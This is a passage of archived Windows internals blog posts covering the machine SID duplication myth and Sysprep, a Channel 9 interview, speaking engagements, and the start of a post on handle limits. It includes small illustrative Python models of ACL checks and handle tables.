The RIDs for these initial accounts are predefined, so the Administrator user always has a RID of 500: </P> <P> <IMG alt="image" border="0" height="150" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_1.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121180i8B1A558BD09AF3FE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> After installation, Windows assigns new local user and group accounts with RIDs starting at 1000. You can use PsGetSid to view the name of the account for a specified SID, and here you can see that the local SID that has a RID of 1000 is for the Abby account, the name of the administrator account Windows prompted me to name during setup: </P> <P> <IMG alt="image" border="0" height="127" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121181iD24407ADA0DC1C7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In addition to these dynamically created SIDs, Windows defines a number of accounts that always have predefined SIDs, not just RIDs. 
One example is the Everyone group, which has the SID S-1-1-0 on every Windows system: </P> <P> <IMG alt="image" border="0" height="136" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121182iB108AD303213F91B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another example is the Local System account (System), which is the account in which several system processes like Session Manager (Smss.exe), the Service Control Manager (Services.exe) and Winlogon (Winlogon.exe) run: </P> <P> <IMG alt="image" border="0" height="141" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121183i431EA579EFAD24A8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <H3> SIDs and Access Control Lists </H3> <P> When an account logs on to a Windows system, the Local Security Authority Subsystem (LSASS, Lsass.exe) creates a logon session and a <EM> token </EM> for the session. A token is a data structure the Windows kernel defines to represent the account and it contains the account’s SID, the SIDs of the groups that the account belongs to at the time it authenticated, and the security privileges assigned to the account and the groups. 
When the last token that references a logon session is deleted, LSASS deletes the logon session and the user is considered logged off. Here you can see my interactive logon session, displayed with the Sysinternals <A href="#" mce_href="#" target="_blank"> LogonSessions </A> utility: </P> <P> <IMG alt="image" border="0" height="150" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121184i30A076E16F6B5E46" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here you can see a token LSASS has created for the session in Process Explorer’s handle view. Note that the number following the account name, 7fdee, matches the logon session ID shown by LogonSessions: </P> <P> <IMG alt="image" border="0" height="162" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121185i22463EA02EB2A356" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="334" /> </P> <P> By default, processes inherit a copy of their parent process’s token. Every process running in my interactive session, for example, has a copy of the token that it inherited originally from the Userinit.exe process, the first process Winlogon creates for any interactive logon. 
You can view the contents of a process’s token by double-clicking on the process in <A href="#" mce_href="#" target="_blank"> Process Explorer </A> and switching to the Security page of the process properties dialog: </P> <P> <IMG alt="image" border="0" height="410" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121186iAB27CADE9C0B9D50" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> When one of my processes opens an operating system object, like a file or registry key, the security subsystem executes a permission check that evaluates entries in the object’s access control list (ACL) that reference a SID included in the process’s token. </P> <P> A similar check happens for remote logon sessions, which are the kind created by a “net use” of a remote computer’s share. To successfully connect to a share you must authenticate to the remote system with an account known to that system. If the computer is part of a Workgroup, then the credentials you specify must be for a local account on the remote system; for a Domain-joined system, the credentials can be for a remote system’s local account or a Domain account. When you access a file on the share, the file server driver on that system uses the token from the logon session for the permission check, leveraging a mechanism called <EM> impersonation </EM> . 
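</P> <P> The permission check described in this section can be sketched as a toy model. This is a deliberately simplified illustration in Python, not the Windows implementation: the Ace class, the access_check function, the right names, and the S-1-5-21-1111-2222-3333 machine SID are all hypothetical. It assumes that entries are evaluated in order, that a matching deny entry for a still-needed right ends the check, and that access is granted once every requested right has been allowed. </P>

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Set


@dataclass(frozen=True)
class Ace:
    """One simplified ACL entry (hypothetical model, not a Windows structure)."""
    allow: bool             # True for an allow entry, False for a deny entry
    sid: str                # SID the entry refers to
    rights: FrozenSet[str]  # rights the entry covers, e.g. {"read"}


def access_check(token_sids: Set[str], acl: List[Ace], desired: Set[str]) -> bool:
    """Grant access only if every desired right is allowed before a matching deny."""
    remaining = set(desired)
    for ace in acl:
        if ace.sid not in token_sids:
            continue  # entry references a SID that is not in the token
        if not ace.allow:
            if not ace.rights.isdisjoint(remaining):
                return False  # a still-needed right is explicitly denied
            continue
        remaining -= ace.rights
        if not remaining:
            return True
    return False  # ran out of entries with rights still ungranted


MACHINE_SID = "S-1-5-21-1111-2222-3333"  # made-up machine SID
ABBY = f"{MACHINE_SID}-1000"             # first local account (RID 1000)
OTHER = f"{MACHINE_SID}-1001"            # a second, hypothetical local account
EVERYONE = "S-1-1-0"

acl = [
    Ace(False, OTHER, frozenset({"write"})),
    Ace(True, EVERYONE, frozenset({"read"})),
    Ace(True, ABBY, frozenset({"write"})),
]

print(access_check({ABBY, EVERYONE}, acl, {"read", "write"}))
print(access_check({EVERYONE}, acl, {"write"}))
```

<P> The point of the sketch is that the check only ever consults the SIDs in the token, and that token is built by the system performing the check when the account authenticates to it. 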
</P> <H3> SID Duplication </H3> <P> The Microsoft-supported way to create a Windows installation that’s ready for deployment to a group of computers is to install Windows on a reference computer and prepare the system for cloning by running the Sysprep tool. This is called <EM> generalizing </EM> the image, because when you boot an image created using this process, Sysprep <EM> specializes </EM> the installation by generating a new machine SID, triggering plug-and-play hardware detection, resetting the product activation clock, and setting other configuration data like the new computer name. </P> <P> However, some IT administrators install Windows on one of their systems, install and configure applications, then use deployment tools that don’t reset the SIDs of the copies of the Windows installations. The best practice up to now has been to run a SID-resetting utility like NewSID to change SIDs. These utilities generate a new machine SID, try to find all the locations on a system, including all the file system and registry ACLs, that contain copies of the machine SID, and update them to the new SID. The reason that Microsoft doesn’t support systems modified in this way is that, unlike Sysprep, these tools don’t necessarily know about all the places where Windows stashes away references to the machine SID. The reliability and security of a system that has a mix of the old and new machine SID can’t be guaranteed. </P> <P> So is having multiple computers with the same machine SID a problem? The only way it would be is if Windows ever references the machine SIDs of other computers. 
For example, if the local machine SID were transmitted to a remote system when you connected to it and then used in permissions checks, duplicate SIDs would pose a security problem because the remote system wouldn’t be able to distinguish the SID of the inbound remote account from a local account with the same SID (where the SIDs of both accounts have the same machine SID as their base and the same RID). However, as we reviewed, Windows doesn’t allow you to authenticate to another computer using an account known only to the local computer. Instead, you have to specify credentials for either an account local to the remote system or a Domain account for a Domain the remote computer trusts. The remote computer retrieves the SIDs for a local account from its own Security Accounts Manager (SAM) database and for a Domain account from the Active Directory database on a Domain Controller (DC). The remote computer never references the machine SID of the connecting computer. </P> <P> In other words, it’s not the SID that ultimately gates access to a computer, but an account’s user name and password: simply knowing the SID of an account on a remote system doesn’t allow you access to the computer or any resources on it. As further evidence that a SID isn’t sufficient, remember that built-in accounts like the Local System account have the same SID on every computer, something that would be a major security hole if it were. </P> <P> As I said earlier, there’s one exception to the rule, and that’s DCs themselves. Every Domain has a unique <EM> Domain SID </EM> that’s the machine SID of the system that became the Domain’s first DC, and all machine SIDs for the Domain’s DCs match the Domain SID. So in some sense, that’s a case where machine SIDs do get referenced by other computers. That means that Domain member computers cannot have the same machine SID as that of the DCs and therefore of the Domain. 
However, like member computers, each DC also has a computer account in the Domain, and that’s the identity they have when they authenticate to remote systems. </P> <P> Some articles on SID duplication, including this <A href="#" mce_href="#" target="_blank"> KB article </A> , warn that if multiple computers have the same SID, resources on removable media like an NTFS-formatted FireWire disk can’t be secured to a local account. What they fail to mention is that permissions on removable media provide no security regardless, because a user can connect them to computers running operating systems that don’t honor NTFS permissions. Moreover, removable media tend to have default permissions that grant access to well-known SIDs, such as to the Administrators group, which are the same on all systems. That’s the fundamental rule of physical security and why Windows 7 introduced BitLocker To Go, which enables you to encrypt removable storage. </P> <P> The final case where SID duplication would be an issue is if a distributed application used machine SIDs to uniquely identify computers. No Microsoft software does so, and using the machine SID in that way wouldn’t work anyway because all DCs in a Domain have the same machine SID. Software that relies on unique computer identities uses either computer names or computer Domain SIDs (the SIDs of the computer accounts in the Domain). </P> <H3> The New Best Practice </H3> <P> It’s a little surprising that the SID duplication issue has gone unquestioned for so long, but everyone has assumed that someone else knew exactly why it was a problem. To my chagrin, NewSID has never really done anything useful and there’s no reason to miss it now that it’s retired. 
<SPAN style="font-family: 'Calibri','sans-serif'; font-size: 11pt; mso-fareast-font-family: calibri; mso-fareast-theme-font: minor-latin; mso-ansi-language: en-us; mso-fareast-language: en-us; mso-bidi-language: ar-sa"> Note that Sysprep resets other machine-specific state that, if duplicated, can cause problems for certain applications like Windows Server Update Services (WSUS), so Microsoft’s support policy will still require cloned systems to be made unique with Sysprep. </SPAN> </P> </BODY></HTML> Thu, 27 Jun 2019 06:58:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-machine-sid-duplication-myth-and-why-sysprep-matters/ba-p/723859 MarkRussinovich 2019-06-27T06:58:22Z Channel 9: Inside Windows 7 Redux https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/channel-9-inside-windows-7-redux/ba-p/723850 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 22, 2009 </STRONG> <BR /> <P> Windows 7 hit general availability today, putting it in stores and on new PCs. There are plenty of beneath-the-surface changes that make Windows 7 more power efficient, scalable, secure and responsive (and of course, there are lots of user-visible features, from user-interface enhancements like Aero Snap and Aero Peek, to easier file sharing and streaming with HomeGroup and Play To, to business-focused features like DirectAccess and BranchCache). I recorded a Channel 9 interview last year with Charles Torre where I talked about a number of these enhancements, including core parking, support for systems with more than 64 processors, the removal of the dispatcher lock and more. There’s obviously a lot of interest in Windows 7, because the video has become the most-viewed in Channel 9’s history with 658,000 views at the time of this post! 
</P> <BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Channel 9: Inside Windows 7 </FONT> </A> </P> </BLOCKQUOTE> <P> I always enjoy chatting with Charles and showing my support for Channel 9, so a couple of weeks ago we talked again, this time about some of the changes I didn’t have a chance to cover in my previous Windows 7 interview. In this latest video, I describe Dynamic Fair Share Scheduling (DFSS) and memory management enhancements. I also show demos of process reflection and how Windows divides the processors into groups on a running 256-processor system, something that’s required for compatibility with applications that use thread management APIs designed for systems with no more than 64 processors. Finally, I talk a little about how I started with computers. Enjoy! </P> <BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Channel 9: Inside Windows 7 Redux </FONT> </A> </P> </BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Dave Solomon </FONT> </A> and I, along with Alex Ionescu, are hard at work on the 6th Edition of <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Windows Internals </FONT> </A> that will cover all the significant Windows 7 and Windows Server 2008 R2 kernel changes in detail, but in the meantime stay tuned to my blog where I’m going to start a multi-post Windows 7 and Windows Server 2008 R2 kernel changes series. 
</P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:57:26 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/channel-9-inside-windows-7-redux/ba-p/723850 MarkRussinovich 2019-06-27T06:57:26Z Recent and Upcoming Speaking Engagements https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/recent-and-upcoming-speaking-engagements/ba-p/723849 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 08, 2009 </STRONG> <BR /> <P> I wanted to update you on my recent and upcoming speaking engagements. First, I’ve been hosting a series of virtual roundtables for the <A href="#" target="_blank"> Springboard Series </A> program. Springboard’s purpose is to provide a one-stop resource for IT Pros evaluating, deploying and managing Windows. The most recent roundtable, which took place at the end of September, focused on virtualization technologies such as App-V, XP Mode, MEDV, and Remote Desktop Sessions, and how you can use them to address application compatibility as you move from Windows XP to Windows Vista or Windows 7. At the table we had Microsoft application compatibility experts and industry partners and it was another great discussion of the issues and tradeoffs of various approaches. Check out the recording <A href="#" target="_blank"> here </A> and the previous roundtables <A href="#" target="_blank"> here </A> . </P> <P> On September 22 I delivered a session at the <A href="#" target="_blank"> Intel Developer Forum </A> (IDF) in San Francisco with Shiv Kaushik, an Intel Fellow, on how Microsoft and Intel collaborated during this release cycle to make sure that Windows takes advantage of innovations delivered by new Intel hardware, specifically the Nehalem platform. You can watch the presentation free on Intel’s IDF site <A href="#" target="_blank"> here </A> . 
</P> <P> In November I’ll be speaking at <A href="#" target="_blank"> TechEd Europe </A> in Berlin and the <A href="#" target="_blank"> Professional Developer’s Conference </A> in Los Angeles. I’m delivering four sessions at TechEd, two of which, the Case of the Unexplained and Pushing the Limits of Windows, are based on blog post series I’ve been running: </P> <UL> <LI> <STRONG> Windows 7 and Windows Server 2008 R2 Kernel Changes <BR /> </STRONG> This session goes beneath the hood of Windows 7 and Windows Server 2008 R2 to describe and demonstrate the key changes in the kernel. Topics include: scalability improvements (such as removal of the global scheduler lock, support for more than 64 logical processors, and user mode scheduling), core parking and timer coalescing for power efficiency, trigger-started services, improved multi-function device support, core architecture changes to modularize Windows ("Minwin") and more. </LI> <LI> <STRONG> Case of the Unexplained 2009...Windows Troubleshooting with Mark Russinovich <BR /> </STRONG> Come hear Mark Russinovich, the master of Windows troubleshooting, walk you through step by step how he has solved seemingly unsolvable system and application problems on Windows. With all new real case studies, Mark will show how to apply the Microsoft Debugging Tools and his own Sysinternals tools, including Process Explorer, Process Monitor, and Accesschk, to solve system crashes, process hangs, security vulnerabilities, DLL conflicts, permissions problems, registry misconfiguration, network hangs, and file system issues. These tools are used on a daily basis by Microsoft Product Support and have been used effectively to solve a wide variety of desktop and server issues, so being familiar with their operation and application will assist you in dealing with different problems on Windows. 
</LI> <LI> <STRONG> Pushing the Limits of Windows <BR /> </STRONG> How many processes, threads, and handles can you make?&nbsp; How does Windows react when it's pushed to the limit? This session goes deep into the kernel to explain what limits Windows from creating more processes, threads, and handles, and what the real limits are for physical and virtual memory. How much more can you do with 64 bits? Live demos show the effect on Windows when various resources are exhausted. </LI> <LI> <STRONG> Windows and Malware: Which Features are Security and Which Aren’t <BR /> </STRONG> This session goes under the hood of a number of Windows features that all have the common trait of looking and smelling like security to present their true purpose and value. Learn which technologies, such as Kernel Patch Protection, UAC elevations, Protected Mode Internet Security, Service isolation, Code Integrity, and virtual machines, really make security guarantees and which are really designed to solve other problems. </LI> </UL> <P> At the <A href="#" target="_blank"> PDC </A> , I’ll be delivering the <A href="#" target="_blank"> kernel changes talk </A> and participating in the kernel portion of a Windows 7 boot camp pre-conference that’s free to everyone, whether you’re attending the PDC or not. Joining me will be Memory Manager architect <A href="#" target="_blank"> Landy Wang </A> and Windows Kernel architect <A href="#" target="_blank"> Arun Kishan </A> (who brought us great scalability in Windows Server 2008 R2 by removing the kernel’s dispatcher lock). You can find out more <A href="#" target="_blank"> here </A> . </P> <P> I look forward to seeing you at one of my sessions! </P> <P> Finally, a little off-topic, but I’ve signed up for Twitter and am shooting to be the anti-Ashton Kutcher. Actually, I’m setting my sights a little lower: I want to be the first user to get to 10,000 followers without ever tweeting or following anyone else (in other words, not using Twitter at all). 
Sign up to follow me <A href="#" target="_blank"> here </A> ! </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:57:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/recent-and-upcoming-speaking-engagements/ba-p/723849 MarkRussinovich 2019-06-27T06:57:22Z Pushing the Limits of Windows: Handles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-handles/ba-p/723848 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 29, 2009 </STRONG> <BR /> <P> This is the fifth post in my <STRONG> Pushing the Limits of Windows </STRONG> series where I explore the upper bound on the number and size of resources that Windows manages, such as physical memory, virtual memory, processes and threads. Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <P> This time I’m going to go inside the implementation of handles to find and explain their limits. Handles are data structures that represent open instances of basic operating system objects applications interact with, such as files, registry keys, synchronization primitives, and shared memory. 
There are two limits related to the number of handles a process can create: the maximum number of handles the system sets for a process and the amount of memory available to store the handles and the objects the application is referencing with its handles. </P> <P> In most cases the limits on handles are far beyond what typical applications or a system ever use. However, applications not designed with the limits in mind may push them in ways their developers don’t anticipate. A more common class of problems arises because the lifetime of these resources must be managed by applications and, just like for virtual memory, resource lifetime management is challenging even for the best developers. An application that fails to release unneeded resources causes a leak of the resource that can ultimately cause a limit to be hit, resulting in bizarre and difficult-to-diagnose behaviors for the application, other applications or the system in general. </P> <P> As always, I recommend you read the previous posts because they explain some of the concepts this post references, like paged pool. </P> <H4> Handles and Objects </H4> <P> The kernel-mode core of Windows, which is implemented in the %SystemRoot%\System32\Ntoskrnl.exe image, consists of various subsystems such as the Memory Manager, Process Manager, I/O Manager, and Configuration Manager (registry), which are all parts of the Executive. Each of these subsystems defines one or more types with the Object Manager to represent the resources they expose to applications. 
For example, the Configuration Manager defines the <EM> Key </EM> object to represent an open registry key; the Memory Manager defines the <EM> Section </EM> object for shared memory; the Executive defines <EM> Semaphore </EM> , <EM> Mutant </EM> (the internal name for a mutex), and <EM> Event </EM> synchronization objects (these objects wrap fundamental data structures defined by the operating system’s Kernel subsystem); the I/O Manager defines the <EM> File </EM> object to represent open instances of device driver resources, which include file system files; and the Process Manager defines the <EM> Thread </EM> and <EM> Process </EM> objects I discussed in my last Pushing the Limits post. Every release of Windows introduces new object types, with Windows 7 defining a total of 42. You can see the objects defined by running the Sysinternals <A href="#" mce_href="#" target="_blank"> Winobj </A> utility with administrative rights and navigating to the ObjectTypes directory in the Object Manager namespace: </P> <P> <IMG alt="image" border="0" height="377" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_18.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121164iAD422ECD8A01DD05" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <P> When an application wants to manage one of these resources it first must call the appropriate API to create or open the resource. 
For instance, the <A href="#" mce_href="#" target="_blank"> CreateFile </A> function opens or creates a file, the <A href="#" mce_href="#" target="_blank"> RegOpenKeyEx </A> function opens a registry key, and the <A href="#" mce_href="#" target="_blank"> CreateSemaphoreEx </A> function opens or creates a semaphore. If the function succeeds, Windows allocates a <EM> handle </EM> in the <EM> handle table </EM> of the application’s process and returns the handle value, which applications treat as opaque but that is actually the index of the returned handle in the handle table. </P> <P> With the handle in hand, the application then queries or manipulates the object by passing the handle value to subsequent API functions like <A href="#" mce_href="#" target="_blank"> ReadFile </A> , <A href="#" mce_href="#" target="_blank"> SetEvent </A> , <A href="#" mce_href="#" target="_blank"> SetThreadPriority </A> , and <A href="#" mce_href="#" target="_blank"> MapViewOfFile </A> . The system can look up the object the handle refers to by indexing into the handle table to locate the corresponding handle entry, which contains a pointer to the object. The handle entry also stores the accesses the process was granted at the time it opened the object, which enables the system to make sure it doesn’t allow the process to perform an operation on the object for which it didn’t ask permission. 
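</P> <P> The lookup and access check described above can be modeled with a short sketch. It is a toy illustration only, not the Executive's actual data layout: the class and method names (<EM> HandleTable </EM> , <EM> open </EM> , <EM> reference </EM> ) are hypothetical, a dictionary stands in for the indexed table, and the two access bits are borrowed from the Win32 generic rights purely for readability. </P>

```python
from dataclasses import dataclass

# Access-right bits borrowed from the Win32 generic rights, for illustration only.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000


@dataclass
class HandleEntry:
    obj: object          # stands in for the pointer to the kernel object
    granted_access: int  # access mask recorded when the handle was opened


class HandleTable:
    """Toy per-process handle table (hypothetical; not the real layout)."""

    def __init__(self):
        self._entries = {}
        self._next = 4  # assumption: hand out values in steps of four

    def open(self, obj, desired_access):
        # A real open would run a full access check here; the sketch simply
        # caches the requested access in the new entry.
        handle = self._next
        self._next += 4
        self._entries[handle] = HandleEntry(obj, desired_access)
        return handle

    def reference(self, handle, required_access):
        # Later operations only compare against the cached mask.
        entry = self._entries.get(handle)
        if entry is None:
            raise KeyError("invalid handle")
        if entry.granted_access & required_access != required_access:
            raise PermissionError("access was not granted when the handle was opened")
        return entry.obj

    def close(self, handle):
        del self._entries[handle]


table = HandleTable()
h = table.open("report.txt", GENERIC_READ)
print(table.reference(h, GENERIC_READ))   # the read succeeds
try:
    table.reference(h, GENERIC_WRITE)     # the write was never requested
except PermissionError as err:
    print("write refused:", err)
```

<P> The point of the design is that the expensive check happens once, at open time; every later call pays only for a table lookup and a mask comparison. </P> <P>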
For example, if the process successfully opened a file for read access, the handle entry would look like this: </P> <P> <IMG alt="image" border="0" height="271" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_19.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121165iF3A18DA47E0CE5BA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="380" /> </P> <P> If the process tried to write to the file, the function would fail because the access hadn’t been granted and the cached read access means that the system doesn’t have to execute a more expensive access-check again. </P> <H4> Maximum Number of Handles </H4> <P> You can explore the first limit with the Testlimit tool I’ve been using in this series to empirically explore limits. It’s available for download on the Windows Internals book page <A href="#" mce_href="#" target="_blank"> here </A> . To test the number of handles a process can create, Testlimit implements the –h switch that directs it to create as many handles as possible. It does so by creating an event object with <A href="#" mce_href="#" target="_blank"> CreateEvent </A> and then repeatedly duplicating the handle the system returns using <A href="#" mce_href="#" target="_blank"> DuplicateHandle </A> . By duplicating the handle, Testlimit avoids creating new events and the only resources it consumes are those for the handle table entries. 
Here’s the result of Testlimit with the –h option on a 64-bit system: </P> <P> <IMG alt="image" border="0" height="107" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121166iCAF141C5E3AFBCDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="374" /> </P> <P> The result doesn’t represent the total number of handles a process can create, however, because system DLLs open various objects during process initialization. You see a process’s total handle count by adding a handle count column to Task Manager or Process Explorer. The total shown for Testlimit in this case is 16,711,680: </P> <P> <IMG alt="image" border="0" height="58" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121167i7600247636DAA44B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="197" /> </P> <P> When you run Testlimit on a 32-bit system, the number of handles it can create is slightly different: </P> <P> <IMG alt="image" border="0" height="115" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_3.png" 
original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121168i49BD1D3E9760DFBB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Its total handle count is also different, 16,744,448: </P> <P> <IMG alt="image" border="0" height="44" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121169i248FCCDE24B93728" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="190" /> </P> <P> Where do the differences come from? The answer lies in the way that the Executive, which is responsible for managing handle tables, sets the per-process handle limit, as well as the size of a handle table entry. In one of the rare cases where Windows sets a hard-coded upper limit on a resource, the Executive defines 16,777,216 (16*1024*1024) as the maximum number of handles a process can allocate. Any process that has more than ten thousand handles open at any given point in time is likely either poorly designed or leaking handles, so a limit of 16 million is essentially infinite and simply helps prevent a process with a leak from impacting the rest of the system. Understanding why the numbers Task Manager shows don’t equal the hard-coded maximum requires a look at the way the Executive organizes handle tables. </P> <P> A handle table entry must be large enough to store the granted-access mask and an object pointer. 
The access mask is 32 bits, but the pointer size obviously depends on whether it’s a 32-bit or 64-bit system. Thus, a handle entry is 8 bytes on 32-bit Windows and 12 bytes on 64-bit Windows. 64-bit Windows aligns the handle entry data structure on 64-bit boundaries, so a 64-bit handle entry actually consumes 16 bytes. Here’s the definition for a handle entry on 64-bit Windows, as shown in a kernel debugger using the dt (dump type) command: </P> <P> <IMG alt="image" border="0" height="140" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121170i22304F2671197DC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="484" /> </P> <P> The output reveals that the structure is actually a union that can sometimes store information other than an object pointer and access mask, but those two fields are highlighted. </P> <P> The Executive allocates handle tables on demand in page-sized blocks that it divides into handle table entries. That means a page, which is 4096 bytes on both x86 and x64, can store 512 entries on 32-bit Windows and 256 entries on 64-bit Windows. The Executive determines the maximum number of pages to allocate for handle entries by dividing the hard-coded maximum, 16,777,216, by the number of handle entries in a page, which yields 